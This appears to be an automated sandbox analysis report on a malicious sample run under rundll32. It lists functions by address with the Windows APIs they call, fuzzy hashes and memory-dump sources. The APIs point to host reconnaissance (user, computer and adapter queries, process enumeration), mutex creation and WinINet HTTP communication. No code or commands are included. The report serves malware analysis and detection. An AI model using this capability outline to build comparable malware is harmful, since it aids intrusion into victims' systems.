Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID: .$3$e$k$l$r
API String ID: 3550616410-427081609
Opcode ID: 291297bbe044f9a5b47e76894c7116349fbdee25044733f7824d139af3bc4b69
Instruction ID: 30cbaf85a6c5e17512a64b1459353b519b1d92617a941587b48b11c25aa99be7
Opcode Fuzzy Hash: 291297bbe044f9a5b47e76894c7116349fbdee25044733f7824d139af3bc4b69
Instruction Fuzzy Hash: F9D1F830218E8E8BDB1DDB58D8857F973F6FB95319F18416ED88BC7296DA3098438780

Function 000001E51E964D00 Relevance: 10.8, APIs: 7, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 000001E51E964D92
GetComputerNameExW.KERNEL32 ref: 000001E51E964DA7
GetComputerNameExW.KERNEL32 ref: 000001E51E964DD6
GetTokenInformation.KERNELBASE ref: 000001E51E964E12
GetNativeSystemInfo.KERNEL32 ref: 000001E51E964EC4
GetAdaptersInfo.IPHLPAPI ref: 000001E51E964FB0
GetAdaptersInfo.IPHLPAPI ref: 000001E51E964FF5

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
String ID:
API String ID: 1596153048-0
Opcode ID: 613b39a42297096076d8df795ecebdf88fcc7f73198a8b8cc617fc677116e015
Instruction ID: f0f7a1b9cdf4e63002671977db1a6a06ececace6539270703adbc049ed6c85ec
Opcode Fuzzy Hash: 613b39a42297096076d8df795ecebdf88fcc7f73198a8b8cc617fc677116e015
Instruction Fuzzy Hash: 40A19F30218F888BEB54EB54D8567DEB7E6FB99304F40452AB84AC3291DF78D945CB83

Function 00007DF4D5F10100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

@, xrefs: 00007DF4D5F10237

Memory Dump Source

Source File: 00000005.00000003.1940839234.00007DF4D5F10000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4D5F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_7df4d5f10000_rundll32.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID: @
API String ID: 3332741929-2766056989
Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
Instruction ID: 3a2f94a4c9d1a3d18595ce1a8a413362906430b4d29aeac94dc46f2084d0502f
Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
Instruction Fuzzy Hash: 1071C03161494C8FEF94EF5CC858BA977E5FBA8315F10462AE81EC72A0EF749954CB80

Function 000001E51E941600 Relevance: 1.7, APIs: 1, Instructions: 169
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExitUserThread.NTDLL ref: 000001E51E941794

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: e75aec3f6953e41e68741c2dc53a77bf76e5a07dc3bcd17ab7dcc765f8397e6e
Instruction ID: 98b09615b8275b88e7d16f536efcebcd8bd12c7e49d0a1b5dfb131734552bc9a
Opcode Fuzzy Hash: e75aec3f6953e41e68741c2dc53a77bf76e5a07dc3bcd17ab7dcc765f8397e6e
Instruction Fuzzy Hash: E451B3B4218A484FF758EF28D8557F977E2FB56315F100259E49AC32A2DE28E802CB45

Function 000001E51E94CCE0 Relevance: 1.6, APIs: 1, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrGetProcedureAddress.NTDLL ref: 000001E51E94CDB2

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: AddressProcedure
String ID:
API String ID: 3653107232-0
Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
Instruction ID: d473548a6d94ef7b3078510cb8e07544c3b8e903b97a2e3c09e82a96982aee10
Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
Instruction Fuzzy Hash: F431B771518B884FE768AF08DC467FEB7E1FB85315F50061EE986C3251EA30A84697C7

Function 000001E51E9417B0 Relevance: .4, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b831061e321d0f0397e512eda674e441edaf112183532585def305e7dd2623be
Instruction ID: dc16083402275e94e900eaf89cfea7b0b2a08e766476a23663b325759ed5ee21
Opcode Fuzzy Hash: b831061e321d0f0397e512eda674e441edaf112183532585def305e7dd2623be
Instruction Fuzzy Hash: 99C1E470218E898FEB55EF69D8947EDB7E2FB59304F500169E88AC32A2DF74D841CB41

Function 000001E51E9471B0 Relevance: .1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f32895c8a6bd777c863f07bcc471f4aa86192ec6dfca8913c26ec2998f9c07
Instruction ID: 99f1a8f2e83e44c9d35eb0d1aa74c10f4e66be7432fd1bb20f959049d0115ece
Opcode Fuzzy Hash: 70f32895c8a6bd777c863f07bcc471f4aa86192ec6dfca8913c26ec2998f9c07
Instruction Fuzzy Hash: 52417470524A488FF358EF28D8557EAB7E2FB48318F50466DF45AC32D6CB788845CB81

Function 000001E51E974360 Relevance: .1, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
Instruction ID: c99d4731bdaca3437af54528264ce9fc41e82ee2ec69d47906148eed247275cc
Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
Instruction Fuzzy Hash: 10412FB151CB888FE7749F08E8467EAB7E0F799720F00451FE5C982251DA35A4458BC2

Function 000001E51E973F40 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
Instruction ID: 4d9acc89ce0bcc16ba67dc5ff547280dc57120d1bf809349661c3a46da48c4f7
Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
Instruction Fuzzy Hash: 3311607061DB889FF754EB18D8467EAB7E1FB98765F00491FF889C2250DA7598808B83

Function 000001E51E974BE0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
Instruction ID: 5bfa084e1d58cc56b1f8234b5d29ecb1e4a64316a12be00c39afe745a82e61dd
Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
Instruction Fuzzy Hash: D311C470A5CF898FEB54EF48D8477E9B3D4F788319F44041EE849C2291DB7598808B83

Function 000001E51E957A50 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
Instruction ID: 3096e0c6038bb8ec2cdef776645efde9839928a5a484b2bb95d84503b4a36924
Opcode Fuzzy Hash: 5bb11d53fe8240a521e5f77f5ce288efeffd0a38eebd87c38d9030f26bb6a810
Instruction Fuzzy Hash: FE11C170128F886BF7649B18D8463FE72CAFB88318F50051EFD89822C1DFB5564AA743

Function 000001E51E974FF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
Instruction ID: d37ea3775f7de7b88219ae913e04c1d55a3e00b107ebc270e2f6537cfed42edf
Opcode Fuzzy Hash: a3b493b046dda1831e3ac93b31f1d57d2ffdedc147415695421c0937c946fff3
Instruction Fuzzy Hash: 3311917061CF898FEB58AF08D846BEA77E1F748715F40081EF849C2290DA75A8808A83

Function 000001E51E974740 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
Instruction ID: 33e4fb906c8622297891d4f5a07ed8386defc6ff8a25a646c87d4f2cf0399695
Opcode Fuzzy Hash: c6c2dce99591ed636752d02e92fb4e83679b8b4534c19c070d62bd12e62a70ad
Instruction Fuzzy Hash: EA018430A28F898FE748BB18D4077FA77E2F789714F10451EF849C3691DA35D9408A83

Function 000001E51CC9D2B6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
Instruction ID: 29b90d9f92ff412221afcef0c3733f4846ac4b3e9f2fe7d02f58374eddcb8bee
Opcode Fuzzy Hash: 4f8c2193cd15d56b920b71f0a62798233d7bc621eaf68b72cfb2e802f18a24de
Instruction Fuzzy Hash: 21F08170618B408BE7589F1884C967977E1FB98759F24452EE99987361CB319842CA43

Function 000001E51CC9D326 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
Instruction ID: d748822ecbe9c77a31a004b5a41282b281d162263afc505e1ec3209f800ce1a9
Opcode Fuzzy Hash: 744c819c75b2bbda755093bb73dffba834d27d1bf64d68f532f853bd1298e79c
Instruction Fuzzy Hash: 18F0B470A24F444BC708AF2C884A67933E2F7A8709F54052EA948D7361DB35E8428B43

Function 000001E51E958149 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
Instruction ID: f68604382deac3a739683e6e109f0d3f4cd38f86809ff7d8acdc3dcb456e7993
Opcode Fuzzy Hash: 3a87759f1dbb7da0b31a2215c550786eb7d616866bd4ea5bb0906d9c5e547a0c
Instruction Fuzzy Hash: CED0A77248DB5C4DE7609BD8F4433E8B3D0F780328F40442EC18CC1043D63E40464706

Function 000001E51ADE4340 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001E51ADE4750: GetModuleFileNameW.KERNEL32 ref: 000001E51ADE4791

GetModuleFileNameW.KERNEL32 ref: 000001E51ADE43FC
SHGetSpecialFolderPathW.SHELL32 ref: 000001E51ADE4418
lstrcatW.KERNEL32 ref: 000001E51ADE442B
lstrcatW.KERNEL32 ref: 000001E51ADE4440
lstrcatW.KERNEL32 ref: 000001E51ADE4456
lstrcatW.KERNEL32 ref: 000001E51ADE446B

Part of subcall function 000001E51ADE56E0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 000001E51ADE572D

SafeRWList.LIBCMTD ref: 000001E51ADE44A3

Part of subcall function 000001E51ADEB0A0: std::ios_base::getloc.LIBCPMTD ref: 000001E51ADEB1FC
Part of subcall function 000001E51ADEB0A0: char_traits.LIBCPMTD ref: 000001E51ADEB31E
Part of subcall function 000001E51ADEB0A0: ctype.LIBCPMTD ref: 000001E51ADEB385

Part of subcall function 000001E51ADE5540: shared_ptr.LIBCPMTD ref: 000001E51ADE5560

Part of subcall function 000001E51ADEB0A0: char_traits.LIBCPMTD ref: 000001E51ADEB3F1
Part of subcall function 000001E51ADEB0A0: char_traits.LIBCPMTD ref: 000001E51ADEB4BF
Part of subcall function 000001E51ADEB0A0: std::ios_base::width.LIBCPMTD ref: 000001E51ADEB4FF

Strings

\NTUSER.DAT.Not, xrefs: 000001E51ADE43CF
DLLMain, xrefs: 000001E51ADE43DB

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: lstrcat$char_traits$FileModuleNameProcessorVirtual$Concurrency::FolderListPathRootRoot::SafeSpecialctypeshared_ptrstd::ios_base::getlocstd::ios_base::width
String ID: DLLMain$\NTUSER.DAT.Not
API String ID: 3304544195-2041910327
Opcode ID: d30e8e5b88aad5fa04ee92c3bd5113da6591793adca71e7613593e8e8900fb11
Instruction ID: b8d00ccbb3b7a226b3b3ea8b105e7f379e99367cf8a44f082f0d5e2204c0d715
Opcode Fuzzy Hash: d30e8e5b88aad5fa04ee92c3bd5113da6591793adca71e7613593e8e8900fb11
Instruction Fuzzy Hash: 86911072219EC595EB21DB24F4943DE63A3F7C4788F804112DA9D87AABEF39C548CB40

Function 000001E51E947830 Relevance: 10.8, APIs: 7, Instructions: 340
networkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 000001E51E94788A
InternetConnectW.WININET ref: 000001E51E9478CB
HttpOpenRequestW.WININET ref: 000001E51E94791F
HttpSendRequestA.WININET ref: 000001E51E9479DA
InternetQueryDataAvailable.WININET ref: 000001E51E947A53
RtlReAllocateHeap.NTDLL ref: 000001E51E947AA4

Part of subcall function 000001E51E96B4E0: RtlFreeHeap.NTDLL ref: 000001E51E96B51D

InternetCloseHandle.WININET ref: 000001E51E947B11

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: Internet$HeapHttpOpenRequest$AllocateAvailableCloseConnectDataFreeHandleQuerySend
String ID:
API String ID: 3737532752-0
Opcode ID: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
Instruction ID: 0f7edb9d343335f38f5fc27832aee697d6764d1aaf214d2ee2afc94abb0e4357
Opcode Fuzzy Hash: bbb038b860022ece9c615c8651eb51f5b0c4a447bc3b9e1814cb5cd5c2ae45f2
Instruction Fuzzy Hash: 99B19030228E888FE764EF18D8557AEB7D6FB98348F144569BC4AC3291EF74DC419782

Function 00007FFDF9111330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocExNuma.KERNEL32 ref: 00007FFDF91113AB

Strings

@, xrefs: 00007FFDF9111399
,=, xrefs: 00007FFDF911134D
+=, xrefs: 00007FFDF9111372

Memory Dump Source

Source File: 00000005.00000002.4143819432.00007FFDF9111000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDF9110000, based on PE: true

Associated: 00000005.00000002.4143769575.00007FFDF9110000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4143967323.00007FFDF91DC000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4144639578.00007FFDFA21F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4144681045.00007FFDFA224000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4144712257.00007FFDFA225000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4144754968.00007FFDFA228000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf9110000_rundll32.jbxd

Similarity

API ID: AllocNumaVirtual
String ID: +=$,=$@
API String ID: 4233825816-2127940403
Opcode ID: 90f39fe90f72f0608001160906d043fdca6e6bb2d5c2e1c5a3b78c0ae946c4bd
Instruction ID: 3d20cb168d9bb8a8bc32611a3db64a4a6891b37882464dacde57f21ac9ee91c6
Opcode Fuzzy Hash: 90f39fe90f72f0608001160906d043fdca6e6bb2d5c2e1c5a3b78c0ae946c4bd
Instruction Fuzzy Hash: A5116FA1F1839801FFE88675E93037D6646A716FF4EC043349D2D07BCED96C01058341

Function 00007DF4D5F10000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007DF4D5F10052
Process32First.KERNEL32 ref: 00007DF4D5F1008B
CloseHandle.KERNEL32 ref: 00007DF4D5F100C1

Memory Dump Source

Source File: 00000005.00000003.1940839234.00007DF4D5F10000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4D5F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_7df4d5f10000_rundll32.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
Instruction ID: c91aa88037624f2eab42cf60fc06ad22c0a0f3c5aa18941e972b9b718b9f2872
Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
Instruction Fuzzy Hash: B121CD3061494C8FEBE5EB6CCC58BEA33E5FB98311F404227D41EDB290EE759A448750

Function 000001E51ADE4AF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocExNuma.KERNEL32 ref: 000001E51ADE4B3E

Strings

@, xrefs: 000001E51ADE4B24

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: AllocNumaVirtual
String ID: @
API String ID: 4233825816-2766056989
Opcode ID: 3ad4501b3b3753825116e2f3eb18c4c8e9e85a26242c0a199b5a9ca851232d8f
Instruction ID: a73b0bd6bea40a769753366a19eb866a47f0b13406a0adbee8ccdd71dd8de0cc
Opcode Fuzzy Hash: 3ad4501b3b3753825116e2f3eb18c4c8e9e85a26242c0a199b5a9ca851232d8f
Instruction Fuzzy Hash: E6113072219E8086D751CB19F89471EBBA1F789BA8F101214FB9F87B99DB3DC4548B00

Function 000001E51E948ED0 Relevance: 1.9, APIs: 1, Instructions: 410
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 000001E51E948F00

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
Instruction ID: f659b02594bcf1a426bda83ee387689b4c1de9a7ee5c4c6dd63098f83c4720cb
Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
Instruction Fuzzy Hash: 8DE12F71408A4D8FE751EF14E895BE6BBF4F768344F60067BE84AC2261DB389245CB86

Function 000001E51E96B4E0 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 000001E51E96B51D

Memory Dump Source

Source File: 00000005.00000002.4143359446.000001E51E941000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001E51E941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51e941000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
Instruction ID: 664777e487c9bccdd9584a710086ef8c09fbf8c270feaa802643e097b5394b2d
Opcode Fuzzy Hash: d9c8acccb119fdf6d5691a0567f94fa179966e421fbccb122f962e3160943c6c
Instruction Fuzzy Hash: 3BF01230310E088BFB58E7BAECC47A937E3FB5D345B444055A805C6194EF389441D701

Function 000001E51CC9CA56 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.1718143395.000001E51CC60000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51CC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_1e51cc60000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
Instruction ID: 33141faea4966ae7f299688dd12a6f270148e9ac25587fc1d6792d043db84369
Opcode Fuzzy Hash: 6258ad962565a3180bb006997aefc3c2d41d9dd5a2811c72a17a211375779bb6
Instruction Fuzzy Hash: A901F431219E5A0FE79DE769A8C07E6B6C3F7D835CF5C4065DD18CB286DC26CD814284

Non-executed Functions

Function 000001E51AE17644 Relevance: 6.1, APIs: 4, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001E51AE1766E

Part of subcall function 000001E51AE13B7C: _getptd.LIBCMT ref: 000001E51AE13B92
Part of subcall function 000001E51AE13B7C: __updatetlocinfo.LIBCMT ref: 000001E51AE13BC7
Part of subcall function 000001E51AE13B7C: __updatetmbcinfo.LIBCMT ref: 000001E51AE13BEE

_malloc_crt.LIBCMT ref: 000001E51AE176AE
_invoke_watson.LIBCMT ref: 000001E51AE1776C

Part of subcall function 000001E51AE1A508: _call_reportfault.LIBCMT ref: 000001E51AE1A530

_invoke_watson.LIBCMT ref: 000001E51AE17782

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
String ID:
API String ID: 1584724053-0
Opcode ID: bb9541adda1de7d3445963b5d25e419d471c8ff25f1e67a4739099756cf48ec5
Instruction ID: 6af159807749311029dcf20cf0a31c15f765b1288bfc8251bf40e4ed5872dea9
Opcode Fuzzy Hash: bb9541adda1de7d3445963b5d25e419d471c8ff25f1e67a4739099756cf48ec5
Instruction Fuzzy Hash: 9931C572768AD446EB569B26D5093ED77D2E789BCCF488225DE4E4F79BDE38C0018700

Function 000001E5190C3018 Relevance: 24.2, APIs: 16, Instructions: 157COMMONLIBRARYCODE

Download Yara Rule

APIs

_callnewh.LIBCMT ref: 000001E5190C3026
malloc.LIBCMT ref: 000001E5190C3032

Part of subcall function 000001E5190C1B50: _FF_MSGBANNER.LIBCMT ref: 000001E5190C1B80
Part of subcall function 000001E5190C1B50: _NMSG_WRITE.LIBCMT ref: 000001E5190C1B8A
Part of subcall function 000001E5190C1B50: _callnewh.LIBCMT ref: 000001E5190C1BBE
Part of subcall function 000001E5190C1B50: _errno.LIBCMT ref: 000001E5190C1BC9
Part of subcall function 000001E5190C1B50: _errno.LIBCMT ref: 000001E5190C1BD4

_CxxThrowException.LIBCMT ref: 000001E5190C307B
_heap_init.LIBCMT ref: 000001E5190C3096
_mtinit.LIBCMT ref: 000001E5190C30A6
_RTC_Initialize.LIBCMT ref: 000001E5190C30B6
__crtGetEnvironmentStringsA.LIBCMT ref: 000001E5190C30C8

Part of subcall function 000001E5190CD9C8: _malloc_crt.LIBCMT ref: 000001E5190CDA48
Part of subcall function 000001E5190CD9C8: free.LIBCMT ref: 000001E5190CDA80

_ioinit.LIBCMT ref: 000001E5190C30D4

Part of subcall function 000001E5190CA4B4: _lock.LIBCMT ref: 000001E5190CA4DE
Part of subcall function 000001E5190CA4B4: _calloc_crt.LIBCMT ref: 000001E5190CA4F2

_setenvp.LIBCMT ref: 000001E5190C30ED
_cinit.LIBCMT ref: 000001E5190C30F8
_ioterm.LIBCMT ref: 000001E5190C310C

Part of subcall function 000001E5190CA7E4: free.LIBCMT ref: 000001E5190CA835

_ioterm.LIBCMT ref: 000001E5190C3144
_calloc_crt.LIBCMT ref: 000001E5190C3186

Part of subcall function 000001E5190C5BC0: _calloc_impl.LIBCMT ref: 000001E5190C5BEE

_initptd.LIBCMT ref: 000001E5190C31AE
free.LIBCMT ref: 000001E5190C31C2

Part of subcall function 000001E5190C16CC: _errno.LIBCMT ref: 000001E5190C16EC

_freeptd.LIBCMT ref: 000001E5190C31D3

Memory Dump Source

Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd

Similarity

API ID: _errnofree$_callnewh_calloc_crt_ioterm$EnvironmentExceptionInitializeStringsThrow__crt_calloc_impl_cinit_freeptd_heap_init_initptd_ioinit_lock_malloc_crt_mtinit_setenvpmalloc
String ID:
API String ID: 712202392-0
Opcode ID: 3899b92c9def8d1737fd4a241c48e478abdd423faa6e3756210bf445b346c25b
Instruction ID: 1fba52d11777476b43bfc55d98d6c90569757a8a4f9379ec2db43ad8865e113a
Opcode Fuzzy Hash: 3899b92c9def8d1737fd4a241c48e478abdd423faa6e3756210bf445b346c25b
Instruction Fuzzy Hash: ED516F30624EC64AFB64B7B5D8957ED23FBEB5434CF584DAEAC05C10D7EA28C98086D1

